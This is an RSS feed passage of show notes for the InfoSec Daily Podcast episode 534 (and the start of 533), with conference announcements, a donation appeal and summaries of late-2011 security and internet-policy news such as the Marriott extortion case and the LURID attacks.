		<pubDate>Thu, 01 Dec 2011 02:11:28 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3215</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 534 for November 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 534 for November 30, 2011. &nbsp;Tonight&#39;s podcast is hosted by </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.networkworld.com/news/2011/112411-hungarian-hacks-marriotts-systems-to-253458.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.networkworld.com/news/2011/112411-hungarian-hacks-marriotts-systems-to-253458.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Hungarian citizen has pleaded guilty to stealing confidential information from the computers of Marriott International, and threatening to reveal the information if the hotel chain did not offer him a job maintaining the company&#39;s computers, the Department of Justice said on Wednesday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attila Nemeth, 26, pleaded guilty in the District of Maryland before U.S. District Judge J. Frederick Motz, according to a statement by DOJ. He was detained after he traveled to the U.S. on a ticket purchased by Marriott for a fictitious job interview.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nemeth is said to have admitted that he used an infected email attachment sent to some Marriott employees to install malicious software on the company&#39;s system that gave him a &quot;backdoor&quot; access to proprietary email and other files.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nemeth sent an email to Marriott staff on Nov. 11 last year, informing them that he had been accessing Marriott&#39;s computers for months and had obtained proprietary information, according to Nemeth&#39;s plea agreement. He threatened to reveal the information if Marriott did not give him a job maintaining the company&#39;s computers. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.smh.com.au/world/thai-crackdown-on-facebook-remarks-on-king-20111125-1nz1t.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.smh.com.au/world/thai-crackdown-on-facebook-remarks-on-king-20111125-1nz1t.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thailand has warned users of Facebook that they could face prosecution under harsh lese-majeste laws if they press &#39;&#39;share&#39;&#39; or &#39;&#39;like&#39;&#39; on images or articles considered unflattering to the Thai monarchy.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The prosecution of a Thai-born US citizen who has pleaded guilty to translating a banned biography of King Bhumibol Adulyadej has signalled that authorities are also targeting lese-majeste offences committed overseas.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thailand&#39;s Information and Communications Technology Minister, Anudith Nakornthap, says that even though Facebook clicks of &#39;&#39;like&#39;&#39; or &#39;&#39;share&#39;&#39; are only done to show support for messages, they could violate laws that carry sentences of three to 15 years jail for each charge.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.echannelline.com/usa/brief.cfm?item=18717"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.echannelline.com/usa/brief.cfm?item=18717</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google replaced Microsoft as the number one vendor for reported vulnerabilities, with a total of 82, due to existing vulnerabilities in Chrome as the browser grows in popularity. Oracle came in second, with 63; Microsoft fell to third place, with 58, all according to</span><a href="http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/3q_2011_threat_roundup.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Trend Micro&#39;s Third Quarter Threat Report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trend Micro</span><a href="http://www.google.com/help/stock_disclaimer.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">threat researchers also witnessed a significant shift from mass compromises to targeted attacks, particularly against large enterprises and government institutions. Their work led them to the uncovering of one of the most notable groups of targeted attacks during the third quarter &ndash; the LURID downloader.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These attacks, which were classified by Trend Micro as advanced persistent threats (APTs), targeted major companies and institutions in over 60 countries, including Russia, Kazakhstan, and the Ukraine. The cybercriminals behind these attacks launched over 300 malware campaigns in order to obtain confidential data from and take full control of affected users&#39; systems over an extended period of time. LURID was successful because it was targeted by its nature. By zoning in on specific geographic locations and entities, LURID compromised as many as 1,465 systems.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.telegraph.co.uk/technology/news/8915245/Criminals-and-cyber-bullies-to-be-banned-from-the-web.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.telegraph.co.uk/technology/news/8915245/Criminals-and-cyber-bullies-to-be-banned-from-the-web.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Criminals who commit offences online and cyber bullies will be banned from the internet as part of the Government&rsquo;s new cyber security strategy, announced today. &nbsp;&nbsp;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> It calls for police and courts to make more use of existing &ldquo;cyber sanctions&rdquo; to restrict access to the social networks and instant messaging services in cases of hacking, fraud and online bullying. Sex offenders and those convicted of harrassment or anti-social behaviour also face more internet restrictions under the new strategy.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Similar orders have been imposed on those charged with involvement in a series of cyber attacks by the Anonymous and LulzSec groups earlier this year, while they await trial.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber sanctions were also used following the riots this summer. Two teenagers in Dundee were banned from the web for inciting riots via Facebook.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials are now looking into whether &quot;cyber tag&quot; technology could be used to monitor offenders and report to authorities if break their bail or sentence conditions by using the internet.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Ministry of Justice and the Home Office will consider and scope the development of a new way of enforcing these orders, using &lsquo;cyber-tags&rsquo; which are triggered by the offender breaching the conditions that have been put on their internet use, and which will automatically inform the police or probation service,&quot; cyber security strategy said. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://torrentfreak.com/mpaa-costs-hollywood-more-than-us-bittorrent-piracy-111122/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://torrentfreak.com/mpaa-costs-hollywood-more-than-us-bittorrent-piracy-111122/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During the last year Netflix managed to outgrow BitTorrent in terms of the amount of US Internet traffic it generates. A promising finding for Hollywood as it shows that there&rsquo;s an overwhelming interest for the legal movie streaming service. At TorrentFreak we wondered what might happen if all US BitTorrent users made the switch to Netflix, and the results of this exploration are quite intriguing.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The movie industry claims that piracy is costing them billions of dollars a year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Luckily for Hollywood, many Americans choose to consume their online media through legal services such as Netflix. In fact, there are now so many that the total Internet traffic generated by Netflix has outgrown that of BitTorrent.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This made us wonder &ndash; what would happen if all movie-downloading BitTorrent users made the switch to Netflix? What if movie piracy via BitTorrent disappeared?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Before we crunch some numbers we have to say that the model we use relies on a lot of assumptions. However, we try to keep these in favor of the movie industry to maximize their potential &lsquo;profits&rsquo;. We obviously chose Netflix as a BitTorrent replacement because it comes closest to what &lsquo;pirates&rsquo; want. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2011/11/24/eu-court-rules-isps-cant-be-forced-to-filter-out-illegal-content/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2011/11/24/eu-court-rules-isps-cant-be-forced-to-filter-out-illegal-content/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The European Court of Justice this morning ruled that content owners can not strong-arm Internet service providers (ISPs) into filtering out copyright-infringing content.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This case has its origin in a dispute between ISP Scarlet and SABAM, a Belgian management company responsible for authorizing the use by third parties of the musical works of authors, composers and editors. In 2004, the right-holders group established that users of Scarlet&rsquo;s services were downloading such musical works from its catalogue by means of peer-to-peer (p2p) file-sharing networks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Belgium&rsquo;s Court of First Instance ordered Scarlet, on pain of a periodic penalty, to bring those copyright infringements to an end by making it impossible for its customers to send or receive in any way electronic files &ndash; a filter, in other words. Scarlet appealed the decision, claiming the ruling was incompatible with EU law as well as the e-Commerce Directive.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Indeed, EU law says national authorities must not adopt measures which would require an ISP to carry out general monitoring &ndash; let alone filtering &ndash; of the information that it transmits on its network.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-534-deceived-hacker-15-years-for-1-click-we%e2%80%99re-no-1-banned-in-the-uk-cure-worse-than-the-disease-and-eu-isp%e2%80%99s-aren%e2%80%99t-content-police/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3215/0/infosec-daily-podcast-episode-534.mp3" length="22267965" type="audio/mpeg" />
		<itunes:duration>0:46:21</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 534 for November 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka the[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 534 for November 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.networkworld.com/news/2011/112411-hungarian-hacks-marriotts-systems-to-253458.html
	A Hungarian citizen has pleaded guilty to stealing confidential information from the computers of Marriott International, and threatening to reveal the information if the hotel chain did not offer him a job maintaining the company&#39;s computers, the Department of Justice said on Wednesday.
	Attila Nemeth, 26, pleaded guilty in the District of Maryland before U.S. District Judge J. Frederick Motz, according to a statement by DOJ. He was detained after he traveled to the U.S. on a ticket purchased by Marriott for a fictitious job interview.
	Nemeth is said to have admitted that he used an infected email attachment sent to some Marriott employees to install malicious software on the company&#39;s system that gave him a &#34;backdoor&#34; access to proprietary email and other files.
	Nemeth sent an email to Marriott staff on Nov. 11 last year, informing them that he had been accessing Marriott&#39;s computers for months and had obtained proprietary information, according to Nemeth&#39;s plea agreement. He threatened to reveal the information if Marriott did not give him a job maintaining the company&#39;s computers. 
	&#8230;
	Source: http://www.smh.com.au/world/thai-crackdown-on-facebook-remarks-on-king-20111125-1nz1t.html
	Thailand has warned users of Facebook that they could face prosecution under harsh lese-majeste laws if they press &#39;&#39;share&#39;&#39; or &#39;&#39;like&#39;&#39; on images or articles considered unflattering to the Thai monarchy.
	The prosecution of a Thai-born US citizen who has pleaded guilty to translating a banned biography of King Bhumibol Adulyadej has signalled that authorities are also targeting lese-majeste offences committed overseas.
	Thailand&#39;s Information and Communications Technology Minister, Anudith Nakornthap, says that even though Facebook clicks of &#39;&#39;like&#39;&#39; or &#39;&#39;share&#39;&#39; are only done to show support for messages, they could violate laws that carry sentences of three to 15 years jail for each charge.
	&#8230;
	Source: http://www.echannelline.com/usa/brief.cfm?item=18717
	Google replaced Microsoft as the number one vendor for reported vulnerabilities, with a total of 82, due to existing vulnerabilities in Chrome as the browser grows in popularity. Oracle came in second, with 63[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 533 &#8211; Interview with Thomas Ryan</title>
		<link>http://www.isdpodcast.com/episode-533-interview-with-thomas-ryan</link>
		<comments>http://www.isdpodcast.com/episode-533-interview-with-thomas-ryan#comments</comments>
		<pubDate>Wed, 30 Nov 2011 02:33:04 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3211</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 533 for November 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 533 for November 29, 2011. &nbsp;Tonight&#39;s podcast is hosted by </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes &amp; Dan Houser (@1cissp on twitter)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
